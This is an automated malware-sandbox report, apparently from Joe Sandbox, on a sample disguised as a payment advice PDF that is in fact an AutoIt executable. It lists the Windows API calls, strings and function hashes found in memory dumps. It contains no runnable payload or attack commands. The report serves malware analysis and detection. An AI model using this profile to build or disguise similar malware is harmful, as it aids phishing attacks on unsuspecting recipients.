                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 5fc794624640f5ce73385fe5a862535f7ebe6b9ea3becf2fcd189acb61aa7382
                                                              • Instruction ID: 5ce5849bd157ad6909b2731fd587cc9801fd180865b8ba21bddf13145566f97f
                                                              • Opcode Fuzzy Hash: 5fc794624640f5ce73385fe5a862535f7ebe6b9ea3becf2fcd189acb61aa7382
                                                              • Instruction Fuzzy Hash: 29B09231054248BBEA002BA1EC09F883F7AFB84AA2F404020FB0D84262CB7256508A91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c813785f846c8ba5cf3b79d4d847a719a40e4116b94a72b563d2de32556ab272
                                                              • Instruction ID: ee2a8d2bf42b12724509683933f622f8251568495f79ca3f10918ad3baa48430
                                                              • Opcode Fuzzy Hash: c813785f846c8ba5cf3b79d4d847a719a40e4116b94a72b563d2de32556ab272
                                                              • Instruction Fuzzy Hash: 5E32E222D2AF414DD7239634E822336A749FFB73D5F55D737E81AB5AA6EB28C4834100
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bc4298ae718ce8f0c9a5002d88e0c4510e81f6a142e91a889bf2475052c56dd
                                                              • Instruction ID: 7e7ae076a71354d6cc0b18102240bba96849237eeaafdb8bfdb032ee178ba8c0
                                                              • Opcode Fuzzy Hash: 6bc4298ae718ce8f0c9a5002d88e0c4510e81f6a142e91a889bf2475052c56dd
                                                              • Instruction Fuzzy Hash: A1B1EF20D2AF404DD22796398831336BB5DBFBB2D5F61D71BFC2A70E26EB2185834141
                                                              APIs
                                                              • __time64.LIBCMT ref: 008A889B
                                                                • Part of subcall function 0086520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008A8F6E,00000000,?,?,?,?,008A911F,00000000,?), ref: 00865213
                                                                • Part of subcall function 0086520A: __aulldiv.LIBCMT ref: 00865233
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID:
                                                              • API String ID: 2893107130-0
                                                              • Opcode ID: d3e34e2d924c31e319381dff3884661242461ff5050a481ce766186326f2866b
                                                              • Instruction ID: b456d51ba7f898f0d5eb4bd92ee0187bd71c3122308e88891623ad68ecc2e69e
                                                              • Opcode Fuzzy Hash: d3e34e2d924c31e319381dff3884661242461ff5050a481ce766186326f2866b
                                                              • Instruction Fuzzy Hash: 5E21AF32639610CFD729CF29D841A52B3E5EBA5311B688E6CE0F5CB2C0CF74A905DB54
                                                              APIs
                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008A4C4A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: 6505650bc739473b910ecda6a907b199cb850519e93f16f807600e97efc73fd9
                                                              • Instruction ID: edea11bffd3b1a2dada725bd6b60b68125b92a57631817d1d0b1af44a58bf53d
                                                              • Opcode Fuzzy Hash: 6505650bc739473b910ecda6a907b199cb850519e93f16f807600e97efc73fd9
                                                              • Instruction Fuzzy Hash: 70D05E9916520D78FC1C07209E0FF7A4108F3C27B6FD0B1497209CA8C2ECF06C416031
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00898389), ref: 008987D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: 0c40a805a0834b2589c4cedded80f344c67f6f38a3a6906f1524c698b97d856e
                                                              • Instruction ID: f262d7884f9e18ae61fe62214edc7b0beabae58160b891ee2f47e3416c035472
                                                              • Opcode Fuzzy Hash: 0c40a805a0834b2589c4cedded80f344c67f6f38a3a6906f1524c698b97d856e
                                                              • Instruction Fuzzy Hash: 3BD09E3226490EABEF019EA4DD05EAE3B6AEB04B01F408511FE15D51A1C775D935AB60
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0086A12A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: dfa3ef8bf9381c8a7c1869cda7f58076c95b790eb82ebdb88adb02dd19fbe19e
                                                              • Instruction ID: 566df0e4bc940a9270fbddd293c53d90b287388d9be25460450d360350e33ff0
                                                              • Opcode Fuzzy Hash: dfa3ef8bf9381c8a7c1869cda7f58076c95b790eb82ebdb88adb02dd19fbe19e
                                                              • Instruction Fuzzy Hash: 52A0123000010CB78A001B51EC048447F6DE640190B004020F50C40122873255104580
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9364118d9f00e1aa43d9ce942d5e23f799da16d77d7f4d0cade6e59ff8d0a66
                                                              • Instruction ID: 510cfc21f741d7b8ddd43f41dc7c6c8a3bb29847a739352980c9f6deab181d30
                                                              • Opcode Fuzzy Hash: b9364118d9f00e1aa43d9ce942d5e23f799da16d77d7f4d0cade6e59ff8d0a66
                                                              • Instruction Fuzzy Hash: 6F22563060451ACBDF3A9B64C49477C7BA2FF4134AF28806BDD82EB592DB709C99C742
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction ID: 44e3d6e7e8e0d2c67ab4f7342420abce14945623783e25a3e2565ca3f2911cb5
                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction Fuzzy Hash: 36C160322055930ADF6D4639847803EFAA1BEA27B131B07ADD8B3CF1D5EE20C965D720
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction ID: 263e81b3552d3ae1ea8ef34f865b40c8c8864ddd3968c6e0d5df536aa5a7313c
                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction Fuzzy Hash: 01C152322055930ADF6D463AC47453EBAA1BEA27B131F07ADD4B2DF1D5EE20C925E720
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction ID: ea1e02c2eb65f2f4ff20209ecdc83db9bd428e6160710bdf258c3208777dc677
                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction Fuzzy Hash: F9C1623220519309DF6D463A847813EBAA1FEA27B231F176DD4B2CF1D6EE20C965D760
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                              • Instruction ID: cd66f29c69f26f4539f6f838578c67574c4ce94734bffd433178708cd879d0e2
                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                              • Instruction Fuzzy Hash: 3941D571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                              • Instruction ID: 57ea17fcaabe49b002749630dda9a9675f39dfa618921aca381db3cb70098b9e
                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                              • Instruction Fuzzy Hash: 87019278A01109EFCB84DF98C6909AEFBB6FB48310F608599DD09A7701E730AE41DB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                              • Instruction ID: b01a36e025b6289066af8a1b03e3ce9cba2413924ce59161caf62577d6e7571d
                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                              • Instruction Fuzzy Hash: E6019278A01109EFCB84DF98C5909AEFBB6FB48310F608599DC19A7701E730AE41DB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 008B785B
                                                              • DeleteObject.GDI32(00000000), ref: 008B786D
                                                              • DestroyWindow.USER32 ref: 008B787B
                                                              • GetDesktopWindow.USER32 ref: 008B7895
                                                              • GetWindowRect.USER32(00000000), ref: 008B789C
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008B79DD
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008B79ED
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7A35
                                                              • GetClientRect.USER32(00000000,?), ref: 008B7A41
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008B7A7B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7A9D
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7AB0
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7ABB
                                                              • GlobalLock.KERNEL32(00000000), ref: 008B7AC4
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7AD3
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 008B7ADC
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7AE3
                                                              • GlobalFree.KERNEL32(00000000), ref: 008B7AEE
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7B00
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,008D2CAC,00000000), ref: 008B7B16
                                                              • GlobalFree.KERNEL32(00000000), ref: 008B7B26
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 008B7B4C
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 008B7B6B
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7B8D
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008B7D7A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              • API String ID: 2211948467-2373415609
                                                              • Opcode ID: a6903321cbebabb003423580487d0e7f509663546999df88f2c96fb15b9b5207
                                                              • Instruction ID: 367a874e1171e5d94e7149ce548dd64eebf38c68af17ab5a4f60200960790964
                                                              • Opcode Fuzzy Hash: a6903321cbebabb003423580487d0e7f509663546999df88f2c96fb15b9b5207
                                                              • Instruction Fuzzy Hash: 52022B71910219AFDB14DFA8DC89EAE7BB9FF48310F148169F915EB2A1C774AD01CB60
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,008CF910), ref: 008C3627
                                                              • IsWindowVisible.USER32(?), ref: 008C364B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpperVisibleWindow
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 4105515805-45149045
                                                              • Opcode ID: 0f2d69a8f0835a13ba002a9f8624864bb0aa27154f7811d5ed8caa32c6f098a0
                                                              • Instruction ID: 0fd19fa37dabc053d9e38ed57632c8bf4dd7cb366b37d4c5d4bb87cad9b6b4e8
                                                              • Opcode Fuzzy Hash: 0f2d69a8f0835a13ba002a9f8624864bb0aa27154f7811d5ed8caa32c6f098a0
                                                              • Instruction Fuzzy Hash: 40D159302043159BCA14EF68C451F6E7BA1FF95394F15846CF9C6DB2A2DB31EA0ADB42
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 008CA630
                                                              • GetSysColorBrush.USER32(0000000F), ref: 008CA661
                                                              • GetSysColor.USER32(0000000F), ref: 008CA66D
                                                              • SetBkColor.GDI32(?,000000FF), ref: 008CA687
                                                              • SelectObject.GDI32(?,00000000), ref: 008CA696
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 008CA6C1
                                                              • GetSysColor.USER32(00000010), ref: 008CA6C9
                                                              • CreateSolidBrush.GDI32(00000000), ref: 008CA6D0
                                                              • FrameRect.USER32(?,?,00000000), ref: 008CA6DF
                                                              • DeleteObject.GDI32(00000000), ref: 008CA6E6
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 008CA731
                                                              • FillRect.USER32(?,?,00000000), ref: 008CA763
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008CA78E
                                                                • Part of subcall function 008CA8CA: GetSysColor.USER32(00000012), ref: 008CA903
                                                                • Part of subcall function 008CA8CA: SetTextColor.GDI32(?,?), ref: 008CA907
                                                                • Part of subcall function 008CA8CA: GetSysColorBrush.USER32(0000000F), ref: 008CA91D
                                                                • Part of subcall function 008CA8CA: GetSysColor.USER32(0000000F), ref: 008CA928
                                                                • Part of subcall function 008CA8CA: GetSysColor.USER32(00000011), ref: 008CA945
                                                                • Part of subcall function 008CA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008CA953
                                                                • Part of subcall function 008CA8CA: SelectObject.GDI32(?,00000000), ref: 008CA964
                                                                • Part of subcall function 008CA8CA: SetBkColor.GDI32(?,00000000), ref: 008CA96D
                                                                • Part of subcall function 008CA8CA: SelectObject.GDI32(?,?), ref: 008CA97A
                                                                • Part of subcall function 008CA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 008CA999
                                                                • Part of subcall function 008CA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008CA9B0
                                                                • Part of subcall function 008CA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 008CA9C5
                                                                • Part of subcall function 008CA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008CA9ED
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              • Opcode ID: 08275021613c7d253f3333863ae4b605ddd1b20179160df4eec61d8e0c2a7bb4
                                                              • Instruction ID: bd5981d0a017bee8daee65bc999b45d1cf4a1b54e7ae46b8fd91aee86bcae5be
                                                              • Opcode Fuzzy Hash: 08275021613c7d253f3333863ae4b605ddd1b20179160df4eec61d8e0c2a7bb4
                                                              • Instruction Fuzzy Hash: 2D915A72008305EFE7119F64DC08E5B7BBAFB88325F144A29FAA2D61A2D771D944CB52
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?), ref: 00842CA2
                                                              • DeleteObject.GDI32(00000000), ref: 00842CE8
                                                              • DeleteObject.GDI32(00000000), ref: 00842CF3
                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00842CFE
                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00842D09
                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0087C43B
                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0087C474
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0087C89D
                                                                • Part of subcall function 00841B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00842036,?,00000000,?,?,?,?,008416CB,00000000,?), ref: 00841B9A
                                                              • SendMessageW.USER32(?,00001053), ref: 0087C8DA
                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0087C8F1
                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0087C907
                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0087C912
                                                              Strings
                                                              Similarity
                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                              • String ID: 0
                                                              • API String ID: 464785882-4108050209
                                                              • Opcode ID: ae4e3eb45835bc046d2d10f577cbca281ea59d120c07d79dc341410aa62113a8
                                                              • Instruction ID: c8dfe829311aae3a3468f0c0e0ff560825c9949908c937ccedcb6971c31f1023
                                                              • Opcode Fuzzy Hash: ae4e3eb45835bc046d2d10f577cbca281ea59d120c07d79dc341410aa62113a8
                                                              • Instruction Fuzzy Hash: 91128C30604205EFDB25CF28C884BA9BBE5FF54314F5485ADF999CB266CB31E842DB91
                                                              APIs
                                                              • DestroyWindow.USER32(00000000), ref: 008B74DE
